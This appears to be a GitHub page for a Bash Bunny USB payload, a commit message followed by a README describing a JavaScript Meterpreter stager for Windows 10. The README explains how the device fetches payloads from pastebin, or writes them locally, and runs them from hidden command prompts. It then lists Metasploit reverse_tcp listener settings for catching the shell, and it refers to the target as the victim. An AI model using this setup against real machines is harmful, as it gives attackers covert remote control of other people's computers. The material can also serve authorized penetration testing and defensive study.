Aidan Holland 5a77792c1d Update and fix payloads (#277)
* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and Fixed all uses ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors
2017-10-25 11:10:17 +11:00
..
2017-10-25 11:10:17 +11:00

JavaScript Meterpreter Stager Win x86_64

(Author: SubINclS | Version: Version 0.1 | Target: Windows 10)

Description:

  • Tested successful on Win10
  • Modified from following like:
  • USB HID STORAGE Attck
    • Attempts HTTP(s) download of Two (2) additional payloads.
  • These files coinsist of:
    • BB-Meterpreter-Winx64.js -> Actual bytecode of Meterpreter Stager payload
    • inv.vbs -> creates hidden command terminal to execute commands
  • Attempts to execute the malicious payload in an automated fashion from hidden cmd prompts

Script Logic:

  • STAGE1():
    • if payload does not exist on target:
      • if inet connection:
        • Attempts HTTPS connection to pastebin
          • Grabs both payloads and save to %temp%
      • else:
        • Opens a cmd prompt, under current users context
          • Echo contents to two files:
            • BB-Meterpreter_winx64.js
            • inv.vbs
  • STAGE2():
    • Executes hidden cmdshell via inv.vbs, launching payload
  • STAGE3():
    • Shutdown 0

Configuration:

  • Listener:
    • use exploit/multi/handler
    • set PAYLOAD windows/(x64/|)meterpreter/reverse_tcp
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LHOST 0.0.0.0
    • set LPORT 443
    • set EnableUnicodeEncoding true
    • set EnableStageEncoding true
    • set ExitOnSession false
    • exploit -j
  • BashBunny:
    • Edit JSRevMeter replacing the following:
    • Upload monilithic script to your BB

Status:

  • LED => Status/PHASE
  • G => Power/INITILIZE
  • Off => Init/MOUNTING
  • G => Stage1/EXECUTING
  • R => Stage2/EXECUTING
  • B => Stage3/SHUTDOWN
  • OFF => Remove Device from victim